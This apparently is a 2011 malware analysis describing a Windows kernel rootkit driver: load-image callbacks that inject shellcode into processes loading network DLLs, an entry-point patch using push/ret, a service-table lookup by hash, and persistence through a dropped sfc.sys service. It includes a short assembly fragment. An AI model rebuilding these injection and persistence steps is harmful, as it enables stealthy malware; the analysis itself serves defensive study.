In the caller-supplied load-image callback routine:
VOID
(*PLOAD_IMAGE_NOTIFY_ROUTINE) (
IN PUNICODE_STRING FullImageName,
IN HANDLE ProcessId, // where image is mapped
IN PIMAGE_INFO ImageInfo
);
It checks whether the flag corresponding to the "BYE!" data in the value "Properties" is set and, if so, it leaves the routine.
It searches for ".exe", "system32\ntdll.dll", "wininet.dll", "ws2_32.dll", "iertutil.dll", "msvbvm60.dll" in the FullImageName.
If the FullImageName contains ".exe" it searches for the current process pid in the list described above and, if it doesn't exist, it adds a new node.
If the FullImageName contains "system32\ntdll.dll":
- it identifies the function name ZwProtectVirtualMemory by hash (0D3DA486Dh) and gets its address using the KeServiceDescriptorTable:

Ida code:



- it allocates a memory descriptor list for the buffer described above and maps the physical pages.
If the FullImageName contains "wininet.dll", "ws2_32.dll", "iertutil.dll" or "msvbvm60.dll":
If the node corresponding to the current process exists:

- The inject phase becomes 1.

- It creates a system thread (that executes in kernel mode - PsCreateSystemThread) which attaches itself to the running process. It patches the data from the ErrorControl value that represents the shellcode:
pusha
mov eax, the first dword at EntryPoint for the current process
mov ebx, the second dword at EntryPoint+4 for the current process
mov edi, addressOfEntryPoint for the current process

- At the EntryPoint of the current process it puts:
push addressOfTheMappedPages
ret
where addressOfTheMappedPages points to the beginning of the shellcode

- After the patch the inject phase becomes 2.

In a caller-supplied process-creation callback routine:

VOID
(*PCREATE_PROCESS_NOTIFY_ROUTINE) (
IN HANDLE ParentId,
IN HANDLE ProcessId,
IN BOOLEAN Create
);

If the last thread within the process has terminated, for the corresponding node in the list:
- it unmaps the pages
- it frees the corresponding memory descriptor list
- it releases the mutex which corresponded to the pid
- it frees the structure

If the driver doesn't run as a service:
- It doesn't create the first thread.
- It takes the data from the registry value DriveSettings and writes it to "\??\<data from the SystemRoot value>\system32\drivers\sfc.sys".
- It creates "\Registry\Machine\SYSTEM\CurrentControlSet\Services\sfc".
- It sets a dword value "Type" with data 1.
- It loads the driver "\Registry\Machine\SYSTEM\CurrentControlSet\Services\sfc" into the system.
- It deletes "\??\<data from the SystemRoot value>\system32\drivers\sfc.sys".

Last update 21 November 2011
